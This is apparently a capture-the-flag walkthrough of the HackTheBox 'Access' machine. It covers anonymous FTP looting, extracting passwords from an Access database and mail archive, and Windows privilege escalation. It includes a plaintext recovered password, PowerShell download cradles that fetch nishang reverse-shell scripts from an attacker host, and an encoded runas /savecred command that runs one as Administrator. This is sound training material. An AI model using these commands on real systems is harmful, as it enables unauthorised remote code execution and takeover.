HackTheBox - Access

Nmap scan results (Basic and all port)

nmap -sC -sV -oA nmap-access 10.10.10.98

FTP Enumeration

FTP Anonymous access allowed, so we can get all the files present in that share.

We have AccessControl.zip and backup.mdb file from the FTP Server.

A file with the MDB file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... MDB files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint.

Exploring mdbtools

apt-get install mdbtools
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files

This command will download all the necessary tools required for analyzing the backup.mdb file.

We can list all the tables using mdb-tables or mdb-sql command.

Using mdb-tables:

Using mdb-sql:

To extract the information from the tables, we can use mdb-json.

for i in $(mdb-tables backup.mdb);do mdb-json backup.mdb $i;done

The password for zip file is stored inside this backup.mdb file and we can search for it.

Analyzing .pst file using readpst

We can convert .pst file into .mbox which can be human readable using readpst command.

Using Telnet to get shell access

Password for the security account is changed to 4Cc3ssC0ntr0ller

We can use telnet to get a shell access as security user.

This shell is not really stable and we need to get stable shell for further enumeration. So we will be using nishang Shells from github.

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')"

Make sure to add this line at the end of script to run as soon as it gets downloaded on the target computer.

Running JAWS script for system enumeration

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')

We find a very interesting file present under C:\Users\Public\Desktop

Privilege Escalation

We can view the raw contents of the file using get-Content command in powershell or we can view it the other way.

$WScript = New-Object -ComObject Wscript.Shell
$shortcut = Get-ChildItem *.lnk
$WScript.CreateShortcut($shortcut)

We can run this command as Administrator, so we will try to get a reverse shell using this.

We changed the port to 9002 since we already have a connection to port 9001. So now we need to use base64 encoded string to run certain windows commands.

echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

Windows uses UTF-16 Little Endian and we can convert it using iconv. Also after that we can use base64. w flag specifies wrap encoded lines after COLS character

runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="

Note: If we want to access or read all the recently cracked hashes, then we can use the following command. cat ~/.john/john.pot

PreviousHackTheBox - Bastion NextHackTheBox - Optimum

Last updated 3 years ago

Was this helpful?